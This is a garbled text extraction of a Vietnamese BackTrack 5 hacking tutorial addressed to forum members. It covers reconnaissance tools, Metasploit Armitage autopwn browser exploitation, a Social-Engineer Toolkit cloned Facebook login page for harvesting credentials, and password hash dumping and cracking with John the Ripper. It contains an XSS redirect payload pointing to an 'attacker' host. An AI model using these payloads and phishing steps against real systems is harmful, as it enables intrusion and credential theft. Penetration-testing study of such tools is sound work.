Tài liu hng dn này cutynhangheo dành tng cho anh em HCEGroup và TheGioiMang.OrG nhân ngày reopen ca 2 din đàn thân yêu nói trên .Và cutynhangheo có đôi li tâm s vi anh em mi vào chi trò ngh thut này cái nhé .Trong ngh thut hack không có cái gi là s li bing và chây ý, anh em nên quan nim 1 điu khi ta cm thy tha mãn vi nhng gì ta đang có tc là lúc đó ta bt đu lc hu vi th gii .Trong ngh thut hack kin thc, k nng, t duy, s ranh ma và thêm mt chút may mn luôn luôn đi chung vi nhau .Vì vy nu ta cm thy mình đã có đc nhng gì mình mun thì lúc đó mình bt đu mt tt c .Cutynhangheo cng xin nói rng tài liu này ch dùng đ tham kho và s dng đ thc nghim tn công ( pentest ) trong môi trng lab hoc c quan, t chc có nhu cu tn công thc nghim trên h thng ca chính h .Kin thc trong cun sách hng dn này do cutynhangheo thu thp và tham kho nhiu ngun trên Internet, chân thành cm n các tác gi v ngun tài liu mà cutynhangheo đã tham kho qua .
Trang 1Tài li u h ng d n s d ng
Trang 2M c l c
L i nói đ u 3
Ph n I : Thu th p thông tin và gi i thi u v các công c VA 4
1 Thu th p thông tin : 4
2 ánh giá l h ng : 6
Ph n II : Các b công c khai thác ( exploit tools ) và frameworks 10
1 B công c Metasploit Armitage : 10
2 B công c Social-Engineer Tookit : 11
3 B công c leo thang đ c quy n (Privilege escalation tools ) : 12
4 B công c John the Ripper : 13
Ph n III : Các b công c khai thác và frameworks – ti p theo 15
1 ánh c p các thông tin t trình duy t : 15
2 Th c nghi m k thu t đánh c p thông tin : 15
3 B công c Hashcat trong BackTrack 5 : 17
4 Th c nghi m k thu t leo thang đ c quy n : 18
5 Khai thác SQL Injection trong BackTrack 5 : 18
6 S th t b t ng đ ng sau các công c mang tên khai thác t đ ng : 19
Ph n IV : Làm th nào đ n mình 20
1 T i sao ph i n mình ? 20
2 OS backdoor Cymothoa : 20
3 Meterpreter có ph i là backdoor : 22
4 L i d ng l h ng đ có backdoor : 23
Ph n V : Chi ti t m t cu c t n công gi đ nh 24
1 B công c Autoscan Network trong BackTrack 5 : 24
2 Tài nguyên l h ng tr c tuy n : 24
3 Pentest m c tiêu : 25
4 Xóa b d u v t : 26
5 T ng quan v mô hình b o m t Windows : 26
Trang 3L i nói đ u
Tài li u h ng d n này cutynhangheo dành t ng cho anh em HCEGroup và TheGioiMang.OrG nhân
ngày reopen c a 2 di n đàn thân yêu nói trên Và cutynhangheo có đôi l i tâm s v i anh em m i vào
ch i trò ngh thu t này cái nhé Trong ngh thu t hack không có cái g i là s l i bi ng và chây ý, anh
em nên quan ni m 1 đi u khi ta c m th y th a mãn v i nh ng gì ta đang có t c là lúc đó ta b t đ u l c
h u v i th gi i Trong ngh thu t hack ki n th c, k n ng, t duy, s ranh ma và thêm m t chút may m n luôn luôn đi chung v i nhau Vì v y n u ta c m th y mình đã có đ c nh ng gì mình mu n thì lúc đó
mình b t đ u m t t t c Cutynhangheo c ng xin nói r ng tài li u này ch dùng đ tham kh o và s d ng
đ th c nghi m t n công ( pentest ) trong môi tr ng lab ho c c quan, t ch c có nhu c u t n công th c
nghi m trên h th ng c a chính h Ki n th c trong cu n sách h ng d n này do cutynhangheo thu th p
và tham kh o nhi u ngu n trên Internet, chân thành c m n các tác gi v ngu n tài li u mà
cutynhangheo đã tham kh o qua
L n n a cutynhangheo xin nh c l i tài li u này cutynhangheo biên d ch l i và cung c p cho anh em
ch nh m m c đích h c t p và nghiên c u, cutynhangheo không ch u trách nhi m vi c anh em s d ng
ki n th c, k thu t và t duy trong cu n tài li u này dùng đ vi ph m pháp lu t n c C ng Hòa Xã H i
Ch Ngh a Vi t Nam M i hành vi m o danh hay s d ng các ki n th c nói trên cutynhangheo không ch u
trách nhi m tr c pháp lu t
Trang 4Ph n I : Thu th p thông tin và gi i thi u v các công c VA
Phiên b n BackTrack 5 có tên mã là “Revolution” ( t m d ch là “C i ti n” ), phiên b n này r t đ c
gi i b o m t (nh t là gi i Hack) mong đ i; phiên b n này đ c phát hành vào tháng 05 n m 2011 So v i
phiên b n BackTrack 4 R2 thì phiên b n này có nhi u s phát tri n m nh m h n r t nhi u Phiên b n BackTrack 5 này đ c cho r ng các nhà phát tri n đã xây d ng l i t đ u, cung c p cho chúng ta nh ng
c i ti n t t h n và c ng nh fix các l i so v i phiên b n BackTrack 4 R2 tr c đó
BackTrack 5 đ c đ t tên theo m t thu t toán đ c g i là “backtracking” BackTrack 5 cung c p
m t b các công c t crack password, pentest và scan ports BackTrack 5 có 12 b các công c đ c th
hi n nh hình 1 bên d i
Hình 1 : Các b công c trong BackTrack 5
Ng i ki m tra b o m t ( t m g i là Pentester – v i nh ng ng i nh anh em chúng ta t m g i là
sript kiddies, nói dân dã 1 tí là dân đi hack, cutynhangheo xin nh c l i là chúng ta ch a ph i là hacker
th c th OK ! ) th ng th c hi n các quá trình t n công th c nghi m theo 5 b c ( tùy vào t ng môi
tr ng và tr ng h p c th có th nhi u h n 5 b c ) nh sau :
1 B c 1 là thu th p thông tin c a h th ng c n t n công th c nghi m
2 B c 2 là scan bugs ( quét l i ) và đánh giá các đi m y u có th có c a h th ng c n t n công
5 B c 5 là xóa b t t c các d u v t ( trong phim thì g i là “phi tang, di t ch ng”; hehehe )
Trong ph n h ng d n t n công th c nghi m ( pentest ) v i BackTrack 5 này, chúng ta s cùng xem
xét qua ph n thu th p thông tin và b công c đánh giá các l h ng ( n u có ) đ c cung c p trong phiên
b n BackTrack 5 này nhé
1 Thu th p thông tin :
Trang 5Thu th p thông tin là b c ti n hành đ u tiên và c c k quan tr ng trong quá trình t n công th c
nghi m Trong b c này, pentester và attacker s thu th p và có đ c các thông tin s b c a m c
tiêu c n t n công nh h th ng m ng m c tiêu, các c ng đang m , h th ng máy đang live và các
d ch v đang ch y trên t ng c ng đó Theo b n ta thu th p đ c gì ? R t đ n gi n ta s có đ c 1
b ng thông tin v s đ c u trúc c a m c tiêu, bên c nh đó ta còn có thông tin v các h th ng và h
th ng m ng đang đ c s d ng c a m c tiêu Hình 2 bên d i đây là hình ch p c a công c Zenmap,
BackTrack cung c p công c này đ giúp pentester và attacker có th thu th p đ c thông tin và
phân tích h th ng m ng c a m c tiêu
Hình 2 : Công c Zenmap UI trong BackTrack 5
Các ch đ scan c a Zenmap s cung c p cho ta thông tin v m c tiêu nh d ch v đang ch y
trên t ng c ng, phiên b n h đi u hành c a m c tiêu, đ ng đi đ n m c tiêu, workgroups và tài
kho n ng i dùng Các thông tin này th c s h u ích v i ph ng pháp “white box testing” ( t t nhiên c ng h u ích v i attacker )
M t công c thu th p thông tin khác trong BackTrack 5 đó là CMS identification và IDS – IPS identification dùng đ thu th p thông tin và phân tích cho ng d ng web CMS identification s cung
c p các thông tin s b v h th ng CMS m c tiêu, b công c này có th đ c dùng đ đánh giá các
l h ng trên h th ng CMS và đi u thu n ti n nh t là b công c này cung c p các exploit ( khai thác
) có s n đ pentester và attacker có th ki m tra trên h th ng m c tiêu Các công c nh joomscan (
CMS Joomla ) s đ c nói sau trong ph n h ng d n này
M t công c thú v và c c k m nh khác n a là Maltego, công c này th ng dùng đ phân tích
v SMTP Hình 3 bên d i cho th y Maltego đang ho t đ ng
Trang 6Hình 3 : Công c Maltego UI trong BackTrack 5
Trên b ng Palette c a Maltego cho ta th y các thông tin nh DNS Name, Domain, Location,
URL, email và các thông tin chi ti t khác v website Maltego s d ng các tùy bi n khác nhau trên các entities cung c p cho pentester và attacker các thông tin chi ti t c n thi t v m c tiêu Maltego cung c p m t k t qu tr c quan b ng giao di n đ h a v các thông tin thu th p đ c c a m c tiêu
2 ánh giá l h ng :
B c th 2 trong t n công th c nghi m pentest là đánh giá các l h ng ( n u có ) Sau khi đã
th c hi n b c đ u tiên thành công
Thông tin và s đ t ch c c a m c tiêu có đ c thông qua footprinting ( nh h i x a
cutynhangheo đ c đ n đây c nh nh là “in d u n” ), lúc này chúng ta s ti n hành đánh giá phân tích các đi m y u ho c các l h ng trong h th ng c n t n công Trên internet hi n nay có r t nhi u
trang web v b o m t cung c p danh sách các l h ng có th s d ng đ khai thác, nh ng chúng ta s
ch t p trung vào nh ng gì BackTrack 5 cung c p trong series h ng d n này nhé
Web application scans đ c s d ng đ đánh giá và tìm các l h ng c a ng d ng web Hình 4 bên d i đây gi i thi u v công c joomscan trong BackTrack 5 Joomscan có tính n ng là s d ng
các l h ng đ c cung c p trong tài nguyên đ tìm ki m l h ng c a website ch y trên n n Joomla
Trang 7Hình 4 : Công c Joomscan
Joomscan s d ng câu l nh nh sau :
./joomscan.pl –u <string> -x proxy:port
Ph n < string> chính là Website ch y Joomla c n t n công Joomscan có các tùy ch n kèm theo
nh sau ki m tra phiên b n c a Joomla, ki m tra Server, ki m tra Firewall đang ho t đ ng …Nh
hình 4 trên Website Joomla m c tiêu đang ch y trên máy ch web Apache Server và phiên b n PHP đang s d ng là 5.5.16
OpenVAS ( Open Vulnerability Assessment System ) trong BackTrack 5 : M Application
Backtrack Vulnerability scanners OpenVAS s cung c p cho b n m t danh sách các tùy ch n
nh hình 5 bên d i
Trang 8Hình 5 : Các tùy ch n c a OpenVAS trong BackTrack 5
OpenVAS là m t công c m nh trong vi c phân tích và đánh giá l h ng đ i v i m c tiêu c n t n công Nh ng tr c khi s d ng b công c này nhà cung c p khuy n cáo b n c n thi t l p ch ng
th c v i tùy ch n OpenVAS MkCert Sau đó, chúng ta c n t o m t tài kho n ng i dùng m i t trình menu nh trong h ng d n này
Ng i dùng có th tùy ch nh đ áp d ng các rule c a mình, ho c s đ c cung c p m t t p h p
r ng b ng cách nh n t h p phím Ctrl + D Khi m t ng i dùng m i đã đ c thêm vào v i các thông tin đ ng nh p, chúng ta đã có th b t đ u s d ng b công c này
Trang 9Hình 6 : Quá trình thêm tài kho n c a OpenVAS
OpenVAS ho t đ ng đánh giá l h ng trên mô hình Client/Server B n nên c p nh t th ng
xuyên danh sách các l h ng m i cho th vi n c a OpenVAS đ có th th c hi n các b c ki m tra có
hi u qu nh t
OpenVAS và Nessus Scanner :
Nessus Scanner là b công c phân tích và đánh giá l h ng t đ ng Chúng ta hãy l t qua
xem s khác bi t gi a 2 b công c này
Nessus Scanner có 2 phiên b n, mi n phí và tr ti n ( cái v này làm nhi u dân đi hack nh
chúng ta vô cùng ái ng i nh ! Ch a hack mà đã t n ti n r i ), trong khi đó OpenVAS thì l i hoàn
toàn mi n phí ( cái này đ c àh nghen, đ ng bao gi có suy ngh đ free là đ cùi anh em nhé, có
nh ng đ free mà ch t l ng ngon h n h n đ tr ti n đàng hoàng, mà xài đ free thì các bác
mu n đánh b n quy n c ng ch ng có c gì x i đ c anh em ta ) Theo đánh giá g n đây cho bi t
thì các tài nguyên cung c p các plugins cho 2 b công c này có s khác nhau đáng k , và tùy
thu c vào nh n đ nh c a m i ng i s đ a ra nh n xét là s có 1 b công c đ c khuyên không
nên s d ng, t t nhiên 1 ch ng trình scan t đ ng s có th đ a ra nh ng đánh giá sai l m, đi u
này là không th tránh kh i ( anh em s h i cutynhangheo t i sao sai l m còn gi i thi u,
cutynhangheo xin tr l i vì b n ch t ch ng trình do con ng i l p trình ra, nó ch bi t làm theo
ch nó không có suy ngh nh con ng i nhé )
Trên internet có r t nhi u nhóm đ c l p ra đ h ng d n cho nhau cách s d ng các b
công c h tr khác, t t nhiên có c các b công c scan t đ ng, nh ng cutynhangheo xin
khuy n cáo v i anh em nh sau ta ch s d ng các b công c scan t đ ng đ đánh giá toàn di n
các l h ng c a các m c tiêu c n t n công BackTrack 5 c ng cung c p các b công c khác
cùng th lo i nh các b công c CISCO, ngh a là các b công c này đ c s d ng đ tìm l
h ng trên h th ng m ng ch y ph n c ng CISCO .Các Fuzzer c ng đ c cung c p, đ c phân
thành 2 lo i Network Fuzzers và VOIP Fuzzers
ó là đi u gi i thích t i sao BackTrack 5 đ c cung c p r t nhi u b công c đ thu th p thông tin và đánh giá l h ng Trong ph n h ng d n này cutynhangheo s c g ng gi i thi u m t ho c hai
b công c mà cutynhangheo c m th y h u d ng cho anh em nhé ( còn l i n u anh em mu n nâng
cao skill thì làm n t lên Google Search dùm cái h, có 1 câu ng n ng “Tôi ch cho cái c n câu
ch tôi không cho con cá” )
Trang 10Ph n II : Các b công c khai thác ( exploit tools ) và frameworks
Trong ph n đ u c a cu n h ng d n v BackTrack 5 này, chúng ta đã đi qua 2 b c là thu th p thông tin và đánh giá l h ng v i các b công c đ c gi i thi u trên Trong ph n hai này, chúng ta s
đ c gi i thi u v các b công c đ khai thác các l h ng t xa và tìm hi u làm th nào đ s d ng các
exploitation frameworks đ leo thang đ c quy n ví d nh s d ng John the Ripper đ crack m t kh u và
truy c p vào m t h th ng Windows t xa nhé
1 B công c Metasploit Armitage :
Metasploit Armitage là phiên b n giao di n đ h a c a b công c khai thác l h ng n i ti ng
Metasploit Framework Cutynhangheo s vi t m t series v h ng d n s d ng Metasploit trong th i
gian s p t i và s cung c p s m cho anh em Trong cu n sách h ng d n v BackTrack 5 này, chúng
ta s đ c gi i thi u cách s d ng autopwn đ khai thác l h ng trình duy t trên h th ng Windows
XP b ng b công c Metasploit Armitage
Hình 7 : B công c Metasploit Armitage ; h th ng Windows b xâm nh p t xa đ c th hi n b ng màu
đ Giao di n console bên d i cho th y quá trình s d ng autopwn đ khai thác l h ng trình duy t trên
h th ng … Armitage c ng thu th p đ c thông tin v h đi u hành c a m c tiêu t n công
V i ph n h ng d n khai thác này, anh em c n 1 website b l i cross-site scripting ( XSS ) v i l
h ng là URL redirection ( chuy n h ng URL ) Khi victim nh p chu t vào 1 URL c th nào đó trên
trình duy t, h th ng c a victim s t o ra m t meterpreter shell o n code URL redirection s có
d ng nh sau :
http://www.xyz?c= "> < meta HTTPEQUIV= "REFRESH" content= "0; url= http://attacker">
Trang 11Tính n ng auto-migration đ c s d ng khai thác s t o ra m t ti n trình m i trên h th ng
victim, b i vì n u nh chúng ta s d ng ph ng pháp khai thác l h ng không s d ng migration, thì
cu c t n công s b h y b ho c k t thúc khi ng i dùng đóng trình duy t Vì v y Migration s giúp
chúng ta duy trì tr ng thái k t n i liên t c v i h th ng victim cho dù victim có đóng trình duy t đi
ch ng n a
Hình 8 : M t minh h a v URL redirection t 1 website b l i XSS , xyz.com, đ n 192.168.13.132 attacker
2 B công c Social-Engineer Tookit :
B công c Social- Engineer Tookit ( SET ) s đ c cutynhangheo gi i thi u chi ti t trong m t
cu n sách h ng d n khác trong th i gian s p t i Trong ph n h ng d n BackTrack 5 này, chúng ta
s t p trung vào ki u t n công đ c g i là tab nabbing Trong m t cu c t n công gi đ nh, victim m
1 liên k t trên trình duy t, ngay sau khi victim chuy n sang 1 tab khác, trang web ban đ u s đ c
thay th b ng 1 trang web gi m o, ki u t n công này cho phép các attacker có đ c các thông tin
đ ng nh p c a victim Victim s b đánh l a đ nh p tên tài kho n và m t kh u c a anh ta vào trang
gi m o này
Trong ki u t n công “social engineer” này, chúng ta s ch n 1 website đ t n công vector và clone trang web đó Chúng ta c n xác đ nh nh ng trang web nào chúng ta c n clone, có các form
đ ng nh p thông tin mà chúng ta mong mu n Cutynhangheo đã clone 1 trang c a Facebook cho
ph n h ng d n BackTrack 5 này v i m c đích ch là trình di n ( cutynhangheo không khuy n khích anh em làm đi u t ng t ) Xin l u ý anh em r ng quá trình clone s không có tác d ng khi chúng ta
không có k t n i internet nhé
Hình 9 bên d i cho th y trang đ ng nh p Facebook gi m o, và hình 10 bên d i các d li u
g i qua ph ng th c POST b SET b t l i
Ph ng pháp t n công này có th m r ng v i các URL mà anh em d tính clone, các trang web
s d ng ph ng th c POST đ đ y d li u, thông tin đó s luôn b thu th p l i b i HTTP ho c
HTTPS SET h tr t t 2 giao th c trên, và cho k t qu t t khi sniffs thông tin đ ng nh p
Trang 12Hình 9 : M t trang đ ng nh p gi m o Facebook đ c t o ra b i b công c Social-Engineer Toolkit v i
các tùy ch n đ c c u hình b i attacker
Hình 10 : D li u POST b thu th p b i b công c Social-Engineer Toolkit framework t 1 trang đ ng
nh p gi m o Facebook
3 B công c leo thang đ c quy n (Privilege escalation tools ) :
Chúng ta bi t r ng không ph i lúc nào chúng ta c ng có quy n administrator hay superuser đ
có th xâm nh p vào m t h th ng t xa c ( d n quá thì không còn gì là thú v OK ! ) Gi ng nh 1
attacker, chúng ta c n m t quy n t i đa trên h th ng victim đ có th th c thi các payloads và th c
hi n các hành đ ng chúng ta mong mu n ( ví d leo lên quy n administrator hay get root gì đó )
.BackTrack 5 cung c p cho chúng ta 1 lo t các b công c leo thang đ c quy n đ đáp ng nh ng
nhu c u th c ti n này, gi ng hình 11 bên d i
Trang 13Hình 11 : Các phân lo i trong b công c leo thang đ c quy n trong BackTrack 5
Nh trên hình 11 chúng ta th y, BackTrack 5 cung c p 4 phân lo i trong b công c leo thang
đ c quy n, m i lo i đ u có cách làm vi c khác nhau ( đ hi u h t các phân lo i này, cutynhangheo đ
ngh anh em s d ng đ c m nh n )
4 B công c John the Ripper :
M t khi victim đã b xâm nh p ( cutynhangheo đ ngh anh em ch a bi t làm sao xâm nh p xin
đ c l i cu n h ng d n s d ng SET và MSF c a cutynhangheo đ bi t thêm chi ti t nhé, không gi i
thích trong ph n h ng d n này m t l m ), các cracker th ng s d ng b công c John the Ripper
đ crack các Password Windows hashes t đó s d ng đ leo thang đ c quy n và có đ c quy n
qu n tr h th ng
Sau khi khai thác qua l h ng, các pass hashes này s đ c dump l i thành 1 file text và cung c p
cho John the Ripper John the Ripper là b công c r t m nh v vi c crack các password hashes Hình 12 và 13 bên d i th hi n quá trình crack password hashes liên quan đ n vi c leo thang đ c
quy n trên h th ng Windows Cu c t n công nh demo có th s d ng 2 b công c Metasploit
Framework hay Social-Engineer Toolkit
Hình 12 : ây là quá trình dump password hashes b ng b công c hashdump, k t quá này s xu t ra file
text đ cung c p cho John the Ripper th c hi n crack pass
H th ng victim theo nh hình bên d i s đ c li t kê danh sách các tài kho n và m t kh u theo
cách c a John the Ripper